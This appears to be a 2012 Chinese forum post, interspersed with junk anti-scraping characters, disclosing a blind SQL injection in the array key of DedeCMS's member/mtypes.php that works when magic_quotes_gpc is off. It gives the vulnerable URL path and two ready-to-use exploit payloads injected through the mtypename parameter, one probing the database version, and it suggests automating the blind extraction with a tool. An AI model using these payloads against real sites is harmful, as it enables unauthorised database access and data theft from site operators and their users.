需要magic_quotes_gpc = Off,所以说是鸡肋啊.0 Q2 N7 i! i0 l1 V, A& u
, |: P# V; r- Q1 l7 d/ u0 F
1 D5 K! ^' M: C2 {' r0 ?发生在数组key里的注射漏洞,有点意思.
/ ~' v! Q$ j- N) ?& W ! W+ Q; x2 v/ j" h- @
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下2 F3 S( w- i* q5 f( k# G
3 v& ~5 v: S$ W. a2 Y8 I, lhttp://www.xxx.com /dede/member/mtypes.php?dopost=save
: k! e" a9 ?& R) t/ O ; c% Z$ {( p4 Y# N
exploit:8 m. s0 }* u, X, A9 C) x
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
- j; V5 J& E; z; L' T* Cmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r6 I) \/ ~9 d' F+ N, N
|
发表于 2012-12-20 08:08:09
收藏
支持
反对